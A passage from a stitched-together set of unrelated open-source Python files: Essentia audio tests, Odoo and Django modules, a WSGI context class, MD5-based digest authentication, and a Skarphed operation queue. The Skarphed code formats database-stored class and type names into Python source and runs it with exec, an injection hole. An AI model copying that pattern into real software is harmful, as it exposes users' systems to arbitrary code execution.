        audio = MonoLoader(filename = join(testdata.audio_dir, 'generated/synthesised/sin440_0db.wav'),
                           sampleRate = sampleRate)()
        speaks = SpectralPeaks(sampleRate = sampleRate,
                               maxPeaks = 1,
                               maxFrequency = sampleRate/2,
                               minFrequency = 0,
                               magnitudeThreshold = 0,
                               orderBy = 'magnitude')
        (freqs, mags) = speaks(Spectrum()(audio))
        hpcp = HPCP()(freqs, mags)
        self.assertEqualVector(hpcp, [1.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.])

    def testAllSemitones(self):
        # Tests whether a spectral peak output of 12 consecutive semitones
        # yields a HPCP of all 1's
        tonic = 440
        freqs = [(tonic * 2**(x/12.)) for x in range(12)]
        mags = [1] * 12
        hpcp = HPCP()(freqs, mags)
        self.assertEqualVector(hpcp, [1.,1.,1.,1.,1.,1.,1.,1.,1.,1.,1.,1.])

    def testSubmediantPosition(self):
        # Make sure that the submediant of a key based on 440 is in the
        # correct location (submediant was randomly selected from all the
        # tones)
        tonic = 440
        submediant = tonic * 2**(9./12.)
        hpcp = HPCP()([submediant], [1])

        self.assertEqualVector(hpcp, [0.,0.,0.,0.,0.,0.,0.,0.,0.,1.,0.,0.])

    def testMaxShifted(self):
        # Tests whether a HPCP reading with only the dominant semitone
        # activated is correctly shifted so that the dominant is at the
        # position 0
        tonic = 440
        dominant = tonic * 2**(7./12.)
        hpcp = HPCP(maxShifted=True)([dominant], [1])

        self.assertEqualVector(hpcp, [1.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.])

    def chordHelper(self, half_steps, tunning, strength):
        notes = [tunning*(2.**(half_steps[i]/12.)) for i in range(len(half_steps))]
        hpcp = HPCP(maxShifted=False)([notes[0], notes[1], notes[2]], strength)
        for i in range(len(hpcp)):
            if i in half_steps: self.assertTrue(hpcp[i]>0)
            elif (i - 12) in half_steps: self.assertTrue(hpcp[i]>0)
            else: self.assertEqual(hpcp[i], 0)

    def testChord(self):
        tunning = 440
        AMajor = [0, 4, 7] # AMajor = A4-C#5-E5
        self.chordHelper(AMajor, tunning, [1,1,1])
        CMajor = [3, -4, -2] # CMajor = C5-F4-G4
        self.chordHelper(CMajor, tunning, [1,1,1])
        CMajor = [-4, 3, -2] # CMajor = C5-F4-G4
        self.chordHelper(CMajor, tunning, [1,0.5,0.2])
        CMajor = [-4, -2, 3] # CMajor = C5-F4-G4
        self.chordHelper(CMajor, tunning, [1,0.5,0.2])
        CMajor = [3, 8, 10] # CMajor = C5-F5-G5
        self.chordHelper(CMajor, tunning, [1,0.5,0.2])
        AMinor = [0, 3, 7] # AMinor = A4-C5-E5
        self.chordHelper(AMinor, tunning, [1,0.5,0.2])
        CMinor = [3, 6, 10] # CMinor = C5-E5-G5
        self.chordHelper(CMinor, tunning, [1,0.5,0.2])


    # Test of various parameter logical bounds

    def testLowFrequency(self):
        hpcp = HPCP(minFrequency=100, maxFrequency=1000)([99], [1])
        self.assertEqualVector(hpcp, [0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.])

    def testHighFrequency(self):
        hpcp = HPCP(minFrequency=100, maxFrequency=1000)([1001], [1])
        self.assertEqualVector(hpcp, [0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.])

    def testSmallMinRange(self):
        self.assertConfigureFails(HPCP(), {'minFrequency':1, 'splitFrequency':200})

    def testSmallMaxRange(self):
        self.assertConfigureFails(HPCP(), {'maxFrequency':1199, 'splitFrequency':1000})

    def testSmallMinMaxRange(self):
        self.assertConfigureFails(HPCP(), {'bandPreset':False, 'maxFrequency':200, 'minFrequency':1})

    def testSizeNonmultiple12(self):
        self.assertConfigureFails(HPCP(), {'size':13})

    def testHarmonics(self):
        # Regression test for the 'harmonics' parameter
        tone = 100. # arbitrary frequency [Hz]
        freqs = [tone, tone*2, tone*3, tone*4]
        mags = [1]*4

        hpcpAlg = HPCP(minFrequency=50, maxFrequency=500, bandPreset=False, harmonics=3)
        hpcp = hpcpAlg(freqs, mags)
        expected = [0., 0., 0., 0.1340538263, 0., 0.2476127148, 0., 0., 0., 0., 1., 0.]
        self.assertAlmostEqualVector(hpcp, expected, 1e-4)

    def testRegression(self):
        # Just makes sure algorithm does not crash on a real data source. This
        # test is not really looking for correctness. Maybe consider revising
        # it.
        inputSize = 512
        sampleRate = 44100

        audio = MonoLoader(filename = join(testdata.audio_dir, join('recorded', 'musicbox.wav')),
                           sampleRate = sampleRate)()

        fc = FrameCutter(frameSize = inputSize,
                         hopSize = inputSize)

        windowingAlg = Windowing(type = 'blackmanharris62')
        specAlg = Spectrum(size=inputSize)
        sPeaksAlg = SpectralPeaks(sampleRate = sampleRate,
                               maxFrequency = sampleRate/2,
                               minFrequency = 0,
                               orderBy = 'magnitude')

        hpcpAlg = HPCP(minFrequency=50, maxFrequency=500, bandPreset=False, harmonics=3)
        frame = fc(audio)
        while len(frame) != 0:
            spectrum = specAlg(windowingAlg(frame))
            (freqs, mags) = sPeaksAlg(spectrum)
            hpcp = hpcpAlg(freqs,mags)
            self.assertTrue(not any(numpy.isnan(hpcp)))
            self.assertTrue(not any(numpy.isinf(hpcp)))
            frame = fc(audio)


suite = allTests(TestHPCP)

if __name__ == '__main__':
    TextTestRunner(verbosity=2).run(suite)

# -*- coding: utf-8 -*-
# Copyright 2016 Onestein (<http://www.onestein.eu>)
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl.html).

{
    'name': 'OAuth2 Disable Login with Odoo.com',
    'version': '10.0.1.0.0',
    'category': 'Tools',
    'author': 'Onestein',
    'license': 'AGPL-3',
    'depends': ['auth_oauth'],
    'data': [
        'data/auth_oauth_data.xml',
    ],
}

# -*- coding: utf-8 -*-
# Generated by Django 1.11.2 on 2017-11-22 07:11
from __future__ import unicode_literals

from django.core.management.sql import emit_post_migrate_signal
from django.db import migrations


def add_executive_group(apps, schema_editor):
    # create group
    db_alias = schema_editor.connection.alias
    emit_post_migrate_signal(1, False, db_alias)
    Group = apps.get_model('auth', 'Group')
    Permission = apps.get_model('auth', 'Permission')
    executive_group, created = Group.objects.get_or_create(name='executive')
    if created:
        # Learning unit
        can_access_learningunit = Permission.objects.get(codename='can_access_learningunit')
        executive_group.permissions.add(can_access_learningunit)


class Migration(migrations.Migration):
    dependencies = [
        ('base', '0207_auto_20171220_1035'),
    ]

    operations = [
        migrations.RunPython(add_executive_group, elidable=True),
    ]

# -*- coding: utf-8 -*-

from openerp import models, fields


class AccountBankStatementLine(models.Model):
    _inherit = "account.bank.statement.line"

    name = fields.Char(
        string='Memo',
        required=False,
        default="",
    )

# -*- coding: utf-8 -*-


# Etalage -- Open Data POIs portal
# By: Emmanuel Raviart <eraviart@easter-eggs.com>
#
# Copyright (C) 2011, 2012 Easter-eggs
# http://gitorious.org/infos-pratiques/etalage
#
# This file is part of Etalage.
#
# Etalage is free software; you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# Etalage is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program.  If not, see <http://www.gnu.org/licenses/>.


"""Context loaded and saved in WSGI requests"""


import gettext

import webob

from . import conf


__all__ = ['Ctx', 'null_ctx']


class Ctx(object):
    _parent = None
    default_values = dict(
        _lang = None,
        _scopes = UnboundLocalError,
        _translator = None,
        base_categories_slug = None,
        category_tags_slug = None,
        container_base_url = None,
        distance = None,  # Max distance in km
        gadget_id = None,
        hide_directory = False,
        req = None,
        subscriber = None,
        )
    env_keys = ('_lang', '_scopes', '_translator')

    def __init__(self, req = None):
        if req is not None:
            self.req = req
            etalage_env = req.environ.get('etalage', {})
            for key in object.__getattribute__(self, 'env_keys'):
                value = etalage_env.get(key)
                if value is not None:
                    setattr(self, key, value)

    def __getattribute__(self, name):
        try:
            return object.__getattribute__(self, name)
        except AttributeError:
            parent = object.__getattribute__(self, '_parent')
            if parent is None:
                default_values = object.__getattribute__(self, 'default_values')
                if name in default_values:
                    return default_values[name]
                raise
            return getattr(parent, name)

    @property
    def _(self):
        return self.translator.ugettext

    def blank_req(self, path, environ = None, base_url = None, headers = None, POST = None, **kw):
        env = environ.copy() if environ else {}
        etalage_env = env.setdefault('etalage', {})
        for key in self.env_keys:
            value = getattr(self, key)
            if value is not None:
                etalage_env[key] = value
        return webob.Request.blank(path, environ = env, base_url = base_url, headers = headers, POST = POST, **kw)

    def get_containing(self, name, depth = 0):
        """Return the n-th (n = ``depth``) context containing attribute named ``name``."""
        ctx_dict = object.__getattribute__(self, '__dict__')
        if name in ctx_dict:
            if depth <= 0:
                return self
            depth -= 1
        parent = ctx_dict.get('_parent')
        if parent is None:
            return None
        return parent.get_containing(name, depth = depth)

    def get_inherited(self, name, default = UnboundLocalError, depth = 1):
        ctx = self.get_containing(name, depth = depth)
        if ctx is None:
            if default is UnboundLocalError:
                raise AttributeError('Attribute %s not found in %s' % (name, self))
            return default
        return object.__getattribute__(ctx, name)

    def iter(self):
        yield self
        parent = object.__getattribute__(self, '_parent')
        if parent is not None:
            for ancestor in parent.iter():
                yield ancestor

    def iter_containing(self, name):
        ctx_dict = object.__getattribute__(self, '__dict__')
        if name in ctx_dict:
            yield self
        parent = ctx_dict.get('_parent')
        if parent is not None:
            for ancestor in parent.iter_containing(name):
                yield ancestor

    def iter_inherited(self, name):
        for ctx in self.iter_containing(name):
            yield object.__getattribute__(ctx, name)

    def lang_del(self):
        del self._lang
        if self.req is not None and self.req.environ.get('etalage') is not None \
                and '_lang' in self.req.environ['etalage']:
            del self.req.environ['etalage']['_lang']

    def lang_get(self):
        if self._lang is None:
            # self._lang = self.req.accept_language.best_matches('en-US') if self.req is not None else []
            # Note: Don't forget to add country-less language code when only a "language-COUNTRY" code is given.
            self._lang = ['fr-FR', 'fr']
            if self.req is not None:
                self.req.environ.setdefault('etalage', {})['_lang'] = self._lang
        return self._lang

    def lang_set(self, lang):
        self._lang = lang
        if self.req is not None:
            self.req.environ.setdefault('etalage', {})['_lang'] = self._lang
        # Reinitialize translator for new languages.
        if self._translator is not None:
            # Don't del self._translator, because attribute _translator can be defined in a parent.
            self._translator = None
            if self.req is not None and self.req.environ.get('etalage') is not None \
                    and '_translator' in self.req.environ['etalage']:
                del self.req.environ['etalage']['_translator']

    lang = property(lang_get, lang_set, lang_del)

    def new(self, **kwargs):
        ctx = Ctx()
        ctx._parent = self
        for name, value in kwargs.iteritems():
            setattr(ctx, name, value)
        return ctx

    @property
    def parent(self):
        return object.__getattribute__(self, '_parent')

    def scopes_del(self):
        del self._scopes
        if self.req is not None and self.req.environ.get('wenoit_etalage') is not None \
                and '_scopes' in self.req.environ['wenoit_etalage']:
            del self.req.environ['wenoit_etalage']['_scopes']

    def scopes_get(self):
        return self._scopes

    def scopes_set(self, scopes):
        self._scopes = scopes
        if self.req is not None:
            self.req.environ.setdefault('wenoit_etalage', {})['_scopes'] = scopes

    scopes = property(scopes_get, scopes_set, scopes_del)

    @property
    def session(self):
        return self.req.environ.get('beaker.session') if self.req is not None else None

    @property
    def translator(self):
        """Get a valid translator object from one or several languages names."""
        if self._translator is None:
            languages = self.lang
            if not languages:
                return gettext.NullTranslations()
            if not isinstance(languages, list):
                languages = [languages]
            translator = gettext.NullTranslations()
            i18n_dir_by_plugin_name = conf['i18n_dir_by_plugin_name'] or {}
            for name, i18n_dir in [
                    ('biryani', conf['biryani_i18n_dir']),
                    (conf['package_name'], conf['i18n_dir']),
                    ] + sorted(i18n_dir_by_plugin_name.iteritems()):
                if name is not None and i18n_dir is not None:
                    translator = new_translator(name, i18n_dir, languages, fallback = translator)
            self._translator = translator
        return self._translator


null_ctx = Ctx()
null_ctx.lang = ['fr-FR', 'fr']


def new_translator(domain, localedir, languages, fallback = None):
    new = gettext.translation(domain, localedir, fallback = True, languages = languages)
    if fallback is not None:
        new.add_fallback(fallback)
    return new

from django.contrib.auth.decorators import login_required
from django.shortcuts import get_object_or_404
from django.http import HttpResponseRedirect, Http404
from django.db.models import Q
from django.contrib import messages

from cc.general.util import render
import cc.ripple.api as ripple
from cc.profile.models import Profile
from cc.relate.forms import EndorseForm, AcknowledgementForm
from cc.relate.models import Endorsement
from cc.feed.models import FeedItem
from cc.general.mail import send_notification
from django.utils.translation import ugettext as _

MESSAGES = {
    'endorsement_saved': _("Endorsement saved."),
    'endorsement_deleted': _("Endorsement deleted."),
    'acknowledgement_sent': _("Acknowledgement sent."),
}

@login_required
@render()
def endorse_user(request, recipient_username):
    recipient = get_object_or_404(Profile, user__username=recipient_username)
    if recipient == request.profile:
        raise Http404()
    try:
        endorsement = Endorsement.objects.get(
            endorser=request.profile, recipient=recipient)
    except Endorsement.DoesNotExist:
        endorsement = None
    if request.method == 'POST':
        if 'delete' in request.POST and endorsement:
            endorsement.delete()
            messages.info(request, MESSAGES['endorsement_deleted'])
            return HttpResponseRedirect(
                endorsement.recipient.get_absolute_url())
        form = EndorseForm(request.POST, instance=endorsement,
                           endorser=request.profile, recipient=recipient)
        if form.is_valid():
            is_new = endorsement is None
            endorsement = form.save()
            if is_new:
                send_endorsement_notification(endorsement)
            messages.info(request, MESSAGES['endorsement_saved'])
            return HttpResponseRedirect(endorsement.get_absolute_url())
    else:
        form = EndorseForm(instance=endorsement, endorser=request.profile,
                           recipient=recipient)
    profile = recipient  # For profile_base.html.
    return locals()

def send_endorsement_notification(endorsement):
    subject = _("%s has endorsed you on Villages.cc") % endorsement.endorser
    send_notification(subject, endorsement.endorser, endorsement.recipient,
                      'endorsement_notification_email.txt',
                      {'endorsement': endorsement})

@login_required
@render()
def endorsement(request, endorsement_id):
    endorsement = get_object_or_404(Endorsement, pk=endorsement_id)
    return locals()
    
@login_required
@render()
def relationships(request):
    accounts = ripple.get_user_accounts(request.profile)
    return locals()

@login_required
@render()
def relationship(request, partner_username):
    partner = get_object_or_404(Profile, user__username=partner_username)
    if partner == request.profile:
        raise Http404  # Can't have relationship with yourself.
    account = request.profile.account(partner)
    if account:
        entries = account.entries 
        balance = account.balance
    else:
        entries = []
        balance = 0
    profile = partner  # For profile_base.html.
    return locals()

@login_required
@render()
def acknowledge_user(request, recipient_username):
    recipient = get_object_or_404(Profile, user__username=recipient_username)
    if recipient == request.profile:
        raise Http404
    # TODO: Don't recompute max_amount on form submit?  Cache, or put in form
    # as hidden field?
    max_amount = ripple.max_payment(request.profile, recipient)
    if request.method == 'POST':
        form = AcknowledgementForm(request.POST, max_ripple=max_amount)
        if form.is_valid():
            acknowledgement = form.send_acknowledgement(
                request.profile, recipient)
            send_acknowledgement_notification(acknowledgement)
            messages.info(request, MESSAGES['acknowledgement_sent'])
            return HttpResponseRedirect(acknowledgement.get_absolute_url())
    else:
        form = AcknowledgementForm(max_ripple=max_amount, initial=request.GET)
    can_ripple = max_amount > 0
    profile = recipient  # For profile_base.html.
    return locals()

def send_acknowledgement_notification(acknowledgement):
    subject = _("%s has acknowledged you on Villages.cc") % (
        acknowledgement.payer)
    send_notification(subject, acknowledgement.payer, acknowledgement.recipient,
                      'acknowledgement_notification_email.txt',
                      {'acknowledgement': acknowledgement})

@login_required
@render()
def view_acknowledgement(request, payment_id):
    try:
        payment = ripple.get_payment(payment_id)
    except ripple.RipplePayment.DoesNotExist:
        raise Http404
    entries = payment.entries_for_user(request.profile)
    if not entries:
        raise Http404  # Non-participants don't get to see anything.
    sent_entries = []
    received_entries = []
    for entry in entries:
        if entry.amount < 0:
            sent_entries.append(entry)
        else:
            received_entries.append(entry)
    return locals()

# -*- coding: utf-8 -*-
##############################################################################
#
#    Ingenieria ADHOC - ADHOC SA
#    https://launchpad.net/~ingenieria-adhoc
#
#    This program is free software: you can redistribute it and/or modify
#    it under the terms of the GNU Affero General Public License as
#    published by the Free Software Foundation, either version 3 of the
#    License, or (at your option) any later version.
#
#    This program is distributed in the hope that it will be useful,
#    but WITHOUT ANY WARRANTY; without even the implied warranty of
#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#    GNU Affero General Public License for more details.
#
#    You should have received a copy of the GNU Affero General Public License
#    along with this program.  If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################

import waybill
import wizard
import travel
import vehicle
import requirement
import res_partner
import waybill_expense
import account_invoice

# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:

# Copyright 2015-2018 Camptocamp SA
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl.html)
from . import mass_reconcile
from . import advanced_reconciliation

# -*- coding: utf-8 -*-
# © 2014 Elico Corp (https://www.elico-corp.com)
# Licence AGPL-3.0 or later(http://www.gnu.org/licenses/agpl.html)


import invoice

import factory

from .models import User

USER_PASSWORD = "2fast2furious"


class UserFactory(factory.DjangoModelFactory):
    name = "John Doe"
    email = factory.Sequence(lambda n: "john{}@example.com".format(n))
    password = factory.PostGenerationMethodCall('set_password', USER_PASSWORD)
    gender = "male"

    class Meta:
        model = User

#!/usr/bin/env python
# -*- coding: utf-8; tab-width: 4; indent-tabs-mode: t -*-
#
# NetProfile: Authentication routines
# © Copyright 2013-2014 Alex 'Unik' Unigovsky
#
# This file is part of NetProfile.
# NetProfile is free software: you can redistribute it and/or
# modify it under the terms of the GNU Affero General Public
# License as published by the Free Software Foundation, either
# version 3 of the License, or (at your option) any later
# version.
#
# NetProfile is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General
# Public License along with NetProfile. If not, see
# <http://www.gnu.org/licenses/>.

from __future__ import (
	unicode_literals,
	print_function,
	absolute_import,
	division
)

import hashlib
import random
import string
import time

from zope.interface import implementer
from pyramid.interfaces import IAuthenticationPolicy
from pyramid.security import (
	Authenticated,
	Everyone
)

class PluginPolicySelected(object):
	def __init__(self, request, policy):
		self.request = request
		self.policy = policy

@implementer(IAuthenticationPolicy)
class PluginAuthenticationPolicy(object):
	def __init__(self, default, routes=None):
		self._default = default
		if routes is None:
			routes = {}
		self._routes = routes

	def add_plugin(self, route, policy):
		self._routes[route] = policy

	def match(self, request):
		if hasattr(request, 'auth_policy'):
			return request.auth_policy
		cur = None
		cur_len = 0
		for route, plug in self._routes.items():
			r_len = len(route)
			if r_len <= cur_len:
				continue
			path = request.path
			if route == path[:r_len]:
				if len(path) > r_len:
					if path[r_len:r_len + 1] != '/':
						continue
				cur = plug
				cur_len = r_len
		if cur:
			request.auth_policy = cur
		else:
			request.auth_policy = self._default
		request.registry.notify(PluginPolicySelected(request, request.auth_policy))
		return request.auth_policy

	def authenticated_userid(self, request):
		return self.match(request).authenticated_userid(request)

	def unauthenticated_userid(self, request):
		return self.match(request).unauthenticated_userid(request)

	def effective_principals(self, request):
		return self.match(request).effective_principals(request)

	def remember(self, request, principal, **kw):
		return self.match(request).remember(request, principal, **kw)

	def forget(self, request):
		return self.match(request).forget(request)

_TOKEN_FILTER_MAP = (
	[chr(n) for n in range(32)] +
	[chr(127), '\\', '"']
)
_TOKEN_FILTER_MAP = dict.fromkeys(_TOKEN_FILTER_MAP, None)

def _filter_token(tok):
	return str(tok).translate(_TOKEN_FILTER_MAP)

def _format_kvpairs(**kwargs):
	return ', '.join('{0!s}="{1}"'.format(k, _filter_token(v)) for (k, v) in kwargs.items())

def _generate_nonce(ts, secret, salt=None, chars=string.hexdigits.upper()):
	# TODO: Add IP-address to nonce
	if not salt:
		try:
			rng = random.SystemRandom()
		except NotImplementedError:
			rng = random
		salt = ''.join(rng.choice(chars) for i in range(16))
	ctx = hashlib.md5(('%s:%s:%s' % (ts, salt, secret)).encode())
	return ('%s:%s:%s' % (ts, salt, ctx.hexdigest()))

def _is_valid_nonce(nonce, secret):
	comp = nonce.split(':')
	if len(comp) != 3:
		return False
	calc_nonce = _generate_nonce(comp[0], secret, comp[1])
	if nonce == calc_nonce:
		return True
	return False

def _generate_digest_challenge(ts, secret, realm, opaque, stale=False):
	nonce = _generate_nonce(ts, secret)
	return 'Digest %s' % (_format_kvpairs(
		realm=realm,
		qop='auth',
		nonce=nonce,
		opaque=opaque,
		algorithm='MD5',
		stale='true' if stale else 'false'
	),)

def _add_www_authenticate(request, secret, realm):
	resp = request.response
	if not resp.www_authenticate:
		resp.www_authenticate = _generate_digest_challenge(
			round(time.time()),
			secret, realm, 'NPDIGEST'
		)

def _parse_authorization(request, secret, realm):
	authz = request.authorization
	if (not authz) or (len(authz) != 2) or (authz[0] != 'Digest'):
		_add_www_authenticate(request, secret, realm)
		return None
	params = authz[1]
	if 'algorithm' not in params:
		params['algorithm'] = 'MD5'
	for required in ('username', 'realm', 'nonce', 'uri', 'response', 'cnonce', 'nc', 'opaque'):
		if (required not in params) or ((required == 'opaque') and (params['opaque'] != 'NPDIGEST')):
			_add_www_authenticate(request, secret, realm)
			return None
	return params

@implementer(IAuthenticationPolicy)
class DigestAuthenticationPolicy(object):
	def __init__(self, secret, callback, realm='Realm'):
		self.secret = secret
		self.callback = callback
		self.realm = realm

	def authenticated_userid(self, request):
		params = _parse_authorization(request, self.secret, self.realm)
		if params is None:
			return None
		if not _is_valid_nonce(params['nonce'], self.secret):
			_add_www_authenticate(request, self.secret, self.realm)
			return None
		userid = params['username']
		if self.callback(params, request) is not None:
			return 'u:%s' % userid
		_add_www_authenticate(request, self.secret, self.realm)

	def unauthenticated_userid(self, request):
		params = _parse_authorization(request, self.secret, self.realm)
		if params is None:
			return None
		if not _is_valid_nonce(params['nonce'], self.secret):
			_add_www_authenticate(request, self.secret, self.realm)
			return None
		return 'u:%s' % params['username']

	def effective_principals(self, request):
		creds = [Everyone]
		params = _parse_authorization(request, self.secret, self.realm)
		if params is None:
			return creds
		if not _is_valid_nonce(params['nonce'], self.secret):
			_add_www_authenticate(request, self.secret, self.realm)
			return creds
		groups = self.callback(params, request)
		if groups is None:
			return creds
		creds.append(Authenticated)
		creds.append('u:%s' % params['username'])
		creds.extend(groups)
		return creds

	def remember(self, request, principal, *kw):
		return []

	def forget(self, request):
		return [('WWW-Authenticate', _generate_digest_challenge(
			round(time.time()),
			self.secret,
			self.realm,
			'NPDIGEST'
		))]


from . import models
from . import lroe

#!/usr/bin/env python

# Copyright (C) 2006-2016  Music Technology Group - Universitat Pompeu Fabra
#
# This file is part of Essentia
#
# Essentia is free software: you can redistribute it and/or modify it under
# the terms of the GNU Affero General Public License as published by the Free
# Software Foundation (FSF), either version 3 of the License, or (at your
# option) any later version.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
# details.
#
# You should have received a copy of the Affero GNU General Public License
# version 3 along with this program. If not, see http://www.gnu.org/licenses/



from essentia_test import *
from essentia.streaming import TCToTotal as sTCToTotal

class TestTCToTotal(TestCase):

    def testEmpty(self):
        gen = VectorInput([])
        tcToTotal = sTCToTotal()
        p = Pool()

        gen.data >> tcToTotal.envelope
        tcToTotal.TCToTotal >> (p, 'lowlevel.tctototal')

        run(gen)

        self.assertRaises(KeyError, lambda: p['lowlevel.tctototal'])


    def testOneValue(self):
        gen = VectorInput([1])
        tcToTotal = sTCToTotal()
        p = Pool()

        gen.data >> tcToTotal.envelope
        tcToTotal.TCToTotal >> (p, 'lowlevel.tctototal')

        self.assertRaises(RuntimeError, lambda: run(gen))


    def testRegression(self):
        envelope = range(22050)
        envelope.reverse()
        envelope = range(22050) + envelope

        gen = VectorInput(envelope)
        tcToTotal = sTCToTotal()
        p = Pool()

        gen.data >> tcToTotal.envelope
        tcToTotal.TCToTotal >> (p, 'lowlevel.tctototal')

        run(gen)

        self.assertAlmostEqual(p['lowlevel.tctototal'],
                               TCToTotal()(envelope))


suite = allTests(TestTCToTotal)

if __name__ == '__main__':
    TextTestRunner(verbosity=2).run(suite)

# Copyright 2015 ACSONE SA/NV
# License AGPL-3.0 or later (https://www.gnu.org/licenses/agpl.html).
from odoo import fields, models


class PosConfig(models.Model):
    _inherit = "pos.config"

    account_analytic_id = fields.Many2one(
        comodel_name="account.analytic.account", string="Analytic Account"
    )

#!/usr/bin/python
#-*- coding: utf-8 -*-

###########################################################
# © 2011 Daniel 'grindhold' Brendle and Team
#
# This file is part of Skarphed.
#
# Skarphed is free software: you can redistribute it and/or 
# modify it under the terms of the GNU Affero General Public License 
# as published by the Free Software Foundation, either 
# version 3 of the License, or (at your option) any later 
# version.
#
# Skarphed is distributed in the hope that it will be 
# useful, but WITHOUT ANY WARRANTY; without even the implied 
# warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR 
# PURPOSE. See the GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public 
# License along with Skarphed. 
# If not, see http://www.gnu.org/licenses/.
###########################################################

import os
from daemon import Daemon
from time import sleep
from StringIO import StringIO
from traceback import print_exc

from skarphedcore.configuration import Configuration
from skarphedcore.database import Database
from skarphedcore.core import Core
from skarphedcore.module import Module

from common.errors import OperationException

class Operation(object):
    """
    Contais everything necessary to Handle Operations
    """

    STATUS_PENDING = 0
    STATUS_ACTIVE = 1
    STATUS_FAILED = 2

    VALID_STORAGE_TYPES = ('int','bool','str','unicode')

    def __init__(self, parent_id = None):
        """

        """
        self._id = None
        self._parent = parent_id
        self._values = {}

    @classmethod
    def drop_operation(cls,operation_id):
        """
        Drops an Operation, identified by it's Operation Id and
        it's children recursively
        Drop deletes the Operations from Database
        """
        db = Database()

        stmnt = "SELECT OPE_ID FROM OPERATIONS WHERE OPE_OPE_PARENT = ? AND OPE_STATUS IN (0, 2) ;"
        cur = db.query(stmnt,(operation_id,))
        for row in cur.fetchallmap():
            cls.drop_operation(row["OPE_ID"])

        stmnt = "DELETE FROM OPERATIONS WHERE OPE_ID = ? AND OPE_STATUS IN (0, 2) ;"
        db.query(stmnt,(operation_id,),commit=True)

    @classmethod
    def retry_operation(cls,operation_id):
        """
        Resets the state of an operation and it's children recursively to 0 (PENDING)
        The operation is identified by a given operationId
        """
        db = Database()

        stmnt = "SELECT OPE_ID FROM OPERATIONS WHERE OPE_OPE_PARENT = ? AND OPE_STATUS = 2 ;"
        cur = db.query(stmnt,(operation_id,))
        for row in cur.fetchallmap():
            cls.retry_operation(row["OPE_ID"])

        stmnt = "UPDATE OPERATIONS SET OPE_STATUS = 0 WHERE OPE_ID = ? AND OPE_STATUS = 2 ;"
        db.query(stmnt,(operation_id,),commit=True)

    @classmethod
    def cancel_operation(cls,operation_id):
        """
        Cancels an Operation, identified by it's Operation Id and
        it's children recursively
        Cancel Deletes the Operation from Database
        """
        db = Database()

        stmnt = "SELECT OPE_ID FROM OPERATIONS WHERE OPE_OPE_PARENT = ? AND OPE_STATUS = 0 ;"
        cur = db.query(stmnt,(operation_id,))
        for row in cur.fetchallmap():
            cls.cancel_operation(row["OPE_ID"])

        stmnt = "DELETE FROM OPERATIONS WHERE OPE_ID = ? AND OPE_STATUS = 0 ;"
        db.query(stmnt,(operation_id,),commit=True)

    @classmethod
    def restore_operation(cls, operation_record):
        """
        Restore an Operationobject stored in the database by a Dataset consisting of
        the operation's ID and the operation's TYPE:
        For example:   {"OPE_ID": 100, "OPE_TYPE": "TestOperation"}
        Restores the Operationobject's _values-attribute by the data saved
        in the DB-Table OPERATIONDATA
        """
        classname = operation_record["OPE_TYPE"]
        module = "" #TODO Implement modulename from database if Operation belongs to Module
        is_operation_of_module = False
        exec """
try:
    type(%(class)s)
except NameError,e:
    is_operation_of_module = True"""%{'class':classname}

        if is_operation_of_module:
            exec """
from %(module)s import %(class)s
operation = %(class)s()"""%{'class':classname,'module':module}
        else:
            exec """
operation = %(class)s()"""%{'class':classname}

        operation.set_id(operation_record['OPE_ID'])
        db = Database()
        stmnt = "SELECT OPD_KEY, OPD_VALUE, OPD_TYPE FROM OPERATIONDATA WHERE OPD_OPE_ID = ? ;"
        cur = db.query(stmnt,(operation_record["OPE_ID"],))
        for row in cur.fetchallmap():
            val = row["OPD_VALUE"]
            exec """val = %s(val)"""%row["OPD_TYPE"]
            operation.set_value(row["OPD_KEY"], val)
        return operation

    @classmethod
    def process_children(cls, operation):
        """
        Recursively executes the workloads of Operation's Childoperations
        It hereby catches exceptions in the workloads, sets the OPE_STATUS
        to 2 (FAILED) if a catch occurs, then passes the exception on to the 
        higher layer.
        If an Operation succeeds, it's entry in DB gets deleted
        """
        db = Database()

        stmnt = "SELECT OPE_ID, OPE_TYPE FROM OPERATIONS WHERE OPE_OPE_PARENT = ? ORDER BY OPE_INVOKED ;"
        stmnt_lock = "UPDATE OPERATIONS SET OPE_STATUS = 1 WHERE OPE_ID = ? ;"
        cur = db.query(stmnt,(operation.get_id(),))
        for row in cur.fetchallmap():
            child_operation = cls.restore_operation(row)
            db.query(stmnt_lock,(child_operation.get_id(),),commit=True)
            try:
                cls.process_children(child_operation)
                child_operation.do_workload()
            except Exception,e:
                stmnt_err = "UPDATE OPERATIONS SET OPE_STATUS = 2 WHERE OPE_ID = ? ;"
                db.query(stmnt_err,(int(row["OPE_ID"]),),commit=True)
                #TODO GENERATE ERROR IN LOG
                raise e
            stmnt_delete = "DELETE FROM OPERATIONS WHERE OPE_ID = ?;"
            db.query(stmnt_delete,(child_operation.get_id(),),commit=True)

    @classmethod
    def process_next(cls):
        """
        Sets the status of the next toplevel operation to 1 (ACTIVE)
        Fetches the next toplevel-operation from the database, applies a FILESYSTEMLOCK!
        Which is /tmp/scv_operating.lck !!! 
        """
        db = Database()
        configuration = Configuration()
        if os.path.exists(configuration.get_entry("core.webpath")+"/scv_operating.lck"):
            return False
